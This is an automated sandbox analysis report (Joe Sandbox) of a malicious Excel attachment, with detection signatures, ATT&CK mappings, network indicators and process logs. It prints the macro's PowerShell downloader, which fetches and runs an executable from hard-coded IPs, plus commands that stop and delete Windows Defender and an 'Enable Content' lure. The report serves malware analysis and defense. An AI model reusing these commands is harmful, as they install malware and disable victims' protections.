
Analysis Report Your_Order_Info_901027.xls

Overview

General Information

Joe Sandbox Version: 25.0.0 Tiger's Eye
Analysis ID: 102806
Start date: 11.01.2019
Start time: 19:36:19
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 7m 27s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: Your_Order_Info_901027.xls
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Java 8.0.1440.1, Flash 30.0.0.113)
Number of new started processes analysed: 21
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Technologies
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • GSI enabled (VBA)
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.expl.evad.winXLS@29/24@0/4
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 67.6% (good quality ratio 64.2%)
  • Quality average: 84.3%
  • Quality standard deviation: 27.3%
HCA Information:
  • Successful, ratio: 99%
  • Number of executed functions: 24
  • Number of non-executed functions: 62
Cookbook Comments:
  • Adjust boot time
  • Found application associated with file extension: .xls
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
Warnings:
  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: powershell.exe, powershell.exe, powershell.exe

Detection

  • Strategy: Threshold
  • Score: 100
  • Range: 0 - 100
  • Reporting: Report FP / FN
  • Whitelisted: false
  • Detection: malicious

Confidence

  • Strategy: Threshold
  • Score: 5
  • Range: 0 - 5
  • Further Analysis Required?: false


Classification

Analysis Advice

All HTTP servers contacted by the sample do not resolve. Likely the sample is an old dropper which no longer works.
Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Mitre Att&ck Matrix

Initial Access
  • Valid Accounts (1)
  • Replication Through Removable Media
  • Drive-by Compromise
  • Exploit Public-Facing Application
  • Spearphishing Link
  • Spearphishing Attachment

Execution
  • Command-Line Interface (1)
  • PowerShell (5)
  • Scripting (5, 2, 1)
  • Exploitation for Client Execution (1, 2)
  • Command-Line Interface
  • Graphical User Interface

Persistence
  • Valid Accounts (1)
  • Modify Existing Service (1)
  • Accessibility Features
  • System Firmware
  • Shortcut Modification
  • Modify Existing Service

Privilege Escalation
  • Valid Accounts (1)
  • Process Injection (1)
  • Path Interception
  • DLL Search Order Hijacking
  • File System Permissions Weakness
  • New Service

Defense Evasion
  • Valid Accounts (1)
  • Disabling Security Tools (1, 1, 1)
  • Process Injection (1)
  • Deobfuscate/Decode Files or Information (1)
  • Scripting (5, 2, 1)
  • Obfuscated Files or Information (2)

Credential Access
  • Credential Dumping
  • Network Sniffing
  • Input Capture
  • Credentials in Files
  • Account Manipulation
  • Brute Force

Discovery
  • Process Discovery (2)
  • Account Discovery (1)
  • Security Software Discovery (1, 2, 1)
  • System Network Configuration Discovery (1)
  • File and Directory Discovery (1)
  • System Information Discovery (2, 4)

Lateral Movement
  • Application Deployment Software
  • Remote Services
  • Windows Remote Management
  • Logon Scripts
  • Shared Webroot
  • Third-party Software

Collection
  • Data from Local System
  • Data from Removable Media
  • Data from Network Shared Drive
  • Input Capture
  • Data Staged
  • Screen Capture

Exfiltration
  • Data Encrypted (2)
  • Exfiltration Over Other Network Medium
  • Automated Exfiltration
  • Data Encrypted
  • Scheduled Transfer
  • Data Transfer Size Limits

Command and Control
  • Standard Cryptographic Protocol (2)
  • Standard Non-Application Layer Protocol (2)
  • Standard Application Layer Protocol (1, 2)
  • Multiband Communication
  • Standard Cryptographic Protocol
  • Commonly Used Port

Signature Overview



AV Detection:

Antivirus detection for URL or domain
  • Source: http://198.46.190.41/largo.vin | Avira URL Cloud: Label: malware
Multi AV Scanner detection for dropped file
  • Source: C:\Users\user\AppData\Local\Temp\tmp0251.exe | virustotal: Detection: 10%
  • Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | virustotal: Detection: 10%

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
  • Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Code function: 18_2_004B2896 CryptStringToBinaryW,CryptStringToBinaryW,CryptStringToBinaryW
  • Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Code function: 18_2_004C051F CryptBinaryToStringW,CryptBinaryToStringW,CryptBinaryToStringW
  • Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Code function: 18_2_004B55B0 CryptAcquireContextW,CryptImportKey,CryptSetKeyParam,CryptSetKeyParam,CryptSetKeyParam,CryptDecrypt,CryptDestroyKey,CryptReleaseContext
  • Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Code function: 18_2_004B863D CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext
  • Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Code function: 20_2_00E155B0 CryptAcquireContextW,CryptImportKey,CryptSetKeyParam,CryptSetKeyParam,CryptSetKeyParam,CryptDecrypt,CryptDestroyKey,CryptReleaseContext
  • Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Code function: 20_2_00E1863D CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext
  • Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Code function: 20_2_00E12896 CryptStringToBinaryW,CryptStringToBinaryW,CryptStringToBinaryW
  • Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Code function: 20_2_00E2051F CryptBinaryToStringW,CryptBinaryToStringW,CryptBinaryToStringW

Spreading:

Creates COM task schedule object (often to register a task for autostart)
  • Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Key opened: HKEY_CURRENT_USER_CLASSES\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
  • Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
  • Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
  • Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
  • Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
  • Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
  • Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgID
  • Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
  • Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
  • Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
  • Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
  • Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
  • Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
  • Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
  • Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Enumerates the file system
  • Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
  • Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
  • Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
  • Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
  • Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
  • Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch
Contains functionality to enumerate / list files inside a directory
  • Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Code function: 18_2_004C31F8 GetFullPathNameW,PathAddBackslashW,FindFirstFileW,FindNextFileW,GetLastError,FindClose
  • Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Code function: 18_2_004C22DE FindFirstFileW,FindNextFileW,FindClose
  • Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Code function: 18_2_004C1368 SHGetFolderPathW,FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,Sleep,FindNextFileW,FindClose
  • Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Code function: 20_2_00E231F8 GetFullPathNameW,PathAddBackslashW,FindFirstFileW,FindNextFileW,GetLastError,FindClose
  • Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Code function: 20_2_00E222DE FindFirstFileW,FindNextFileW,FindClose
  • Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Code function: 20_2_00E21368 SHGetFolderPathW,FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,Sleep,FindNextFileW,FindClose

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
  • Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe
Potential document exploit detected (performs HTTP gets)
  • Source: global traffic | TCP traffic: 192.168.2.2:49221 -> 5.2.70.91:443
Potential document exploit detected (unknown TCP traffic)
  • Source: global traffic | TCP traffic: 192.168.2.2:49220 -> 198.46.190.41:80

Networking:

Connects to IPs without corresponding DNS lookups
  • Source: unknown | TCP traffic detected without corresponding DNS query: 198.46.190.41
Downloads executable code via HTTP
  • Source: global traffic | HTTP traffic detected:
      HTTP/1.1 200 OK
      Date: Fri, 11 Jan 2019 18:37:12 GMT
      Server: Apache/2.4.10 (Debian)
      Last-Modified: Fri, 11 Jan 2019 18:37:12 GMT
      ETag: W/"66e3e-57f332c3fed80"
      Accept-Ranges: bytes
      Content-Length: 421438
HTTP GET or POST without a user agent
  • Source: global traffic | HTTP traffic detected:
      GET /knot1.php HTTP/1.1
      Host: 198.46.190.41
      Connection: Keep-Alive
  • Source: global traffic | HTTP traffic detected:
      GET /largo.vin HTTP/1.1
      Host: 198.46.190.41
IP address seen in connection with other malware
  • Source: Joe Sandbox View | IP Address: 107.172.129.21
  • Source: Joe Sandbox View | IP Address: 198.46.190.41
Internet Provider seen in connection with other malware
  • Source: Joe Sandbox View | ASN Name: AS-COLOCROSSING-ColoCrossingUS
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
  • Source: global traffic | TCP traffic: 192.168.2.2:49220 -> 198.46.190.41:80
  • Source: global traffic | TCP traffic: 192.168.2.2:49221 -> 5.2.70.91:443
Downloads files from webservers via HTTP
  • Source: global traffic | HTTP traffic detected:
      GET /knot1.php HTTP/1.1
      Host: 198.46.190.41
      Connection: Keep-Alive
  • Source: global traffic | HTTP traffic detected:
      GET /largo.vin HTTP/1.1
      Host: 198.46.190.41
Urls found in memory or binary data
  • Source: powershell.exe, 00000007.00000002.2073956655.02111000.00000004.sdmp | String found in binary or memory: http://198.46.190.41
  • Source: powershell.exe, 00000007.00000002.2058181656.000CF000.00000004.sdmp | String found in binary or memory: http://198.46.190.41/knot1.php
  • Source: powershell.exe, 00000007.00000002.2073956655.02111000.00000004.sdmp | String found in binary or memory: http://198.46.190.41/largo.vin
  • Source: powershell.exe, 00000007.00000002.2073956655.02111000.00000004.sdmp | String found in binary or memory: http://198.46.190.41x&
  • Source: tmp0261.exe, 00000014.00000002.2307260018.00284000.00000004.sdmp, tmp0261.exe, 00000014.00000002.2307286354.002AA000.00000004.sdmp | String found in binary or memory: https://5.2.70.91/sat32/899552_W617601.96C4976B204181C08FFC37CA51BCE902/5/spk/
  • Source: tmp0261.exe, 00000014.00000002.2307260018.00284000.00000004.sdmp | String found in binary or memory: https://5.2.70.91/sat32/899552_W617601.96C4976B204181C08FFC37CA51BCE902/5/spk/B
Uses HTTPS
  • Source: unknown | Network traffic detected: HTTP traffic on port 49222 -> 443
  • Source: unknown | Network traffic detected: HTTP traffic on port 49221 -> 443

Spam, unwanted Advertisements and Ransom Demands:

Contains functionality to import cryptographic keys (often used in ransomware)
  • Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Code function: 18_2_004B55B0 CryptAcquireContextW,CryptImportKey,CryptSetKeyParam,CryptSetKeyParam,CryptSetKeyParam,CryptDecrypt,CryptDestroyKey,CryptReleaseContext
  • Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Code function: 20_2_00E155B0 CryptAcquireContextW,CryptImportKey,CryptSetKeyParam,CryptSetKeyParam,CryptSetKeyParam,CryptDecrypt,CryptDestroyKey,CryptReleaseContext

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
  • Source: Screenshot number: 3 | Screenshot OCR: Enable Editing" form the yellow bar and then click 10 "Enable Content" 11 12 13 14 15 16 17
  • Source: Screenshot number: 3 | Screenshot OCR: Enable Content" 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31
  • Source: Screenshot number: 4 | Screenshot OCR: Enable Editing" form the yellow bar and then click 10 "Enable Content" 11 12 13 14 15 16 17
  • Source: Screenshot number: 4 | Screenshot OCR: Enable Content" 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31
  • Source: Document image extraction number: 0 | Screenshot OCR: Enable Editing" form the yellow bar and then click "Enable Content"
  • Source: Document image extraction number: 0 | Screenshot OCR: Enable Content"
  • Source: Document image extraction number: 1 | Screenshot OCR: Enable Editing" form the yellow bar and then click "Enable Content"
  • Source: Document image extraction number: 1 | Screenshot OCR: Enable Content"
  • Source: Screenshot number: 5 | Screenshot OCR: Enable Editing" form the yellow bar and then click 10 "Enable Content" 11 12 13 14 15 16 17
  • Source: Screenshot number: 5 | Screenshot OCR: Enable Content" 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31
  • Source: Screenshot number: 6 | Screenshot OCR: Enable Editing" form the yellow bar and then click 10 "Enable Content" 11 12 13 14 15 16 17
  • Source: Screenshot number: 6 | Screenshot OCR: Enable Content" 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31
  • Source: Screenshot number: 7 | Screenshot OCR: Enable Editing" form the yellow bar and then click 10 "Enable Content" 11 12 13 14 15 16 17
  • Source: Screenshot number: 7 | Screenshot OCR: Enable Content" 11 12 13 14 15 16 17 18 19 20 21 .I kj 22 23 24 25 26 27 28 29
Document contains an embedded VBA macro which may execute processes
  • Source: Your_Order_Info_901027.xls | OLE, VBA macro line: ''Private Declare Function CreateProcess Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As SECURITY_ATTRIBUTES, lpThreadAttributes As SECURITY_ATTRIBUTES, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
  • Source: Your_Order_Info_901027.xls | OLE, VBA macro line: Call Shell(GetDecStr2(Cells(2, 1).Text) & GetDecStr2(Cells(3, 1).Text) & GetDecStr2(Cells(4, 1).Text) & GetDecStr2(Cells(5, 1).Text) & GetDecStr2(Cells(6, 1).Text) & GetDecStr2(Cells(7, 1).Text) & GetDecStr2(Cells(8, 1).Text) & GetDecStr2(Cells(9, 1).Text) & GetDecStr2(Cells(10, 1).Text) & GetDecStr2(Cells(11, 1).Text), Style)
Document contains an embedded VBA macro with suspicious strings
  • Source: Your_Order_Info_901027.xls | OLE, VBA macro line: ''Private Declare Function CreateProcess Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As SECURITY_ATTRIBUTES, lpThreadAttributes As SECURITY_ATTRIBUTES, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
  • Source: Your_Order_Info_901027.xls | OLE, VBA macro line: '' Set ws = CreateObject("WScript.Shell")
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
  • Source: Your_Order_Info_901027.xls | Stream path '_VBA_PROJECT_CUR/VBA/mod1': found possibly 'WScript.Shell' functions currentdirectory, environment, exec, environ
Powershell connects to network
  • Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Network Connect: 198.46.190.41 80
Powershell drops PE file
  • Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\tmp0251.exe
Contains functionality to call native functions
  • Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Code function: 18_2_004B63E7 NtQueryInformationProcess
  • Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Code function: 18_2_003C24D0 GetCurrentProcess,LoadLibraryA,GetProcAddress,GetProcAddress,NtQueryInformationProcess
  • Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Code function: 20_2_00E163E7 NtQueryInformationProcess
  • Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Code function: 20_2_004F24D0 GetCurrentProcess,LoadLibraryA,GetProcAddress,GetProcAddress,NtQueryInformationProcess
Contains functionality to launch a process as a different user
  • Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Code function: 18_2_004BDDC5 GetStartupInfoW,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,RevertToSelf,DuplicateTokenEx,CloseHandle,GetTokenInformation,GetTokenInformation,GetLastError,GetTokenInformation,LookupAccountSidW,CreateProcessAsUserW,CloseHandle,AdjustTokenPrivileges,CloseHandle
Creates mutexes
  • Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\789C000000000
  • Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
  • Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Mutant created: \BaseNamedObjects\Global\789C000000000
Detected potential crypto function
  • Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Code function: 18_2_004B97C5
  • Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Code function: 20_2_00E197C5
Document contains an embedded VBA macro which executes code when the document is opened / closed
  • Source: VBA code instrumentation | OLE, VBA macro: Module \x042d\x0442\x0430\x041a\x043d\x0438\x0433\x0430, Function Workbook_Open | Name: Workbook_Open
Document contains embedded VBA macros
  • Source: Your_Order_Info_901027.xls | OLE indicator, VBA macros: true
Dropped file seen in connection with other malware
  • Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\tmp0251.exe 949C9C16BC08E6CC33D2A16B0B04BB3BE3CA753F63E556209E29B304C729C7CA
  • Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe 949C9C16BC08E6CC33D2A16B0B04BB3BE3CA753F63E556209E29B304C729C7CA
Found potential string decryption / allocating functions
  • Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe | Code function: String function: 0043B240 appears 7614 times
PE file has section (not .text) which is very likely to contain packed code (zlib compression ratio < 0.011)
  • Source: tmp0251.exe.7.dr | Static PE information: Section: .data ZLIB complexity 0.999250687893
  • Source: tmp0261.exe.8.dr | Static PE information: Section: .data ZLIB complexity 0.999250687893
Classification label
  • Source: classification engine | Classification label: mal100.expl.evad.winXLS@29/24@0/4
Contains functionality to adjust token privileges (e.g. debug / backup)Show sources
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 18_2_004BDDC5 GetStartupInfoW,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,RevertToSelf,DuplicateTokenEx,CloseHandle,GetTokenInformation,GetTokenInformation,GetLastError,GetTokenInformation,LookupAccountSidW,CreateProcessAsUserW,CloseHandle,AdjustTokenPrivileges,CloseHandle,18_2_004BDDC5
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 18_2_004C33DD GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,LookupPrivilegeValueW,AdjustTokenPrivileges,RevertToSelf,DuplicateTokenEx,CloseHandle,AdjustTokenPrivileges,CloseHandle,18_2_004C33DD
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 20_2_00E1DDC5 GetStartupInfoW,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,RevertToSelf,DuplicateTokenEx,CloseHandle,GetTokenInformation,GetTokenInformation,GetLastError,GetTokenInformation,LookupAccountSidW,CreateProcessAsUserW,CloseHandle,AdjustTokenPrivileges,CloseHandle,20_2_00E1DDC5
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 20_2_00E233DD GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,LookupPrivilegeValueW,AdjustTokenPrivileges,RevertToSelf,DuplicateTokenEx,CloseHandle,AdjustTokenPrivileges,CloseHandle,20_2_00E233DD
Contains functionality to enum processes or threadsShow sources
Source: C:\Users\user\AppData\Local\Temp\tmp0251.exeCode function: 8_2_002C2E3A CreateToolhelp32Snapshot,Process32NextW,8_2_002C2E3A
Contains functionality to instantiate COM classesShow sources
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 18_2_004BAD5E CoCreateInstance,wsprintfW,18_2_004BAD5E
Creates files inside the user directoryShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Application Data\Microsoft\FormsJump to behavior
Creates temporary filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\HERBBL~1\AppData\Local\Temp\CVR636C.tmpJump to behavior
Document contains an OLE Workbook stream indicating a Microsoft Excel fileShow sources
Source: Your_Order_Info_901027.xlsOLE indicator, Workbook stream: true
Executes batch filesShow sources
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe ''powershell.exe ''<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{(new-object system.net.webclient <#replace ext#> ).downloadfile($string1,''%tmp%\tmp0251.exe'');}catch{$beos1=0;}return $beos1;}$mmb1=@(''198.46.190.41/knot1.php'',''198.12.71.3/knot2.php'',''107.172.129.213/knot3.php'');foreach ($bifa in $mmb1){if(split-strings(''http://''+$bifa) -eq 1){break;} };<#validate component#>start-process ''%tmp%\tmp0251.exe'' -windowstyle hidden;'''| out-file -encoding ascii -filepath %tmp%\tmp6014.bat; start-process '%tmp%\tmp6014.bat' -windowstyle hidden'
Found command line outputShow sources
Parts of this application are using the .NET runtime (probably coded in C#)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Reads ini files
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Reads software policies
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Spawns processes
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe ''powershell.exe ''<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{(new-object system.net.webclient <#replace ext#> ).downloadfile($string1,''%tmp%\tmp0251.exe'');}catch{$beos1=0;}return $beos1;}$mmb1=@(''198.46.190.41/knot1.php'',''198.12.71.3/knot2.php'',''107.172.129.213/knot3.php'');foreach ($bifa in $mmb1){if(split-strings(''http://''+$bifa) -eq 1){break;} };<#validate component#>start-process ''%tmp%\tmp0251.exe'' -windowstyle hidden;'''| out-file -encoding ascii -filepath %tmp%\tmp6014.bat; start-process '%tmp%\tmp6014.bat' -windowstyle hidden'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe ''powershell.exe ''<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{(new-object system.net.webclient <#replace ext#> ).downloadfile($string1,''C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'');}catch{$beos1=0;}return $beos1;}$mmb1=@(''198.46.190.41/knot1.php'',''198.12.71.3/knot2.php'',''107.172.129.213/knot3.php'');foreach ($bifa in $mmb1){if(split-strings(''http://''+$bifa) -eq 1){break;} };<#validate component#>start-process ''C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'' -windowstyle hidden;'''| out-file -encoding ascii -filepath C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat; start-process 'C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat' -windowstyle hidden'
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat' '
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe '<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{(new-object system.net.webclient <#replace ext#> ).downloadfile($string1,'C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe');}catch{$beos1=0;}return $beos1;}$mmb1=@('198.46.190.41/knot1.php','198.12.71.3/knot2.php','107.172.129.213/knot3.php');foreach ($bifa in $mmb1){if(split-strings('http://'+$bifa) -eq 1){break;} };<#validate component#>start-process 'C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe' -windowstyle hidden;
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\tmp0251.exe 'C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'
Source: unknown Process created: C:\Windows\System32\cmd.exe /c sc stop WinDefend
Source: unknown Process created: C:\Windows\System32\cmd.exe /c sc delete WinDefend
Source: unknown Process created: C:\Windows\System32\sc.exe sc stop WinDefend
Source: unknown Process created: C:\Windows\System32\sc.exe sc delete WinDefend
Source: unknown Process created: C:\Windows\System32\cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $true
Source: unknown Process created: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe
Source: unknown Process created: C:\Windows\System32\taskeng.exe taskeng.exe {667810C8-B7B6-4949-B963-0C62CADBB3B4} S-1-5-18:NT AUTHORITY\System:Service:
Source: unknown Process created: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe 'C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe'
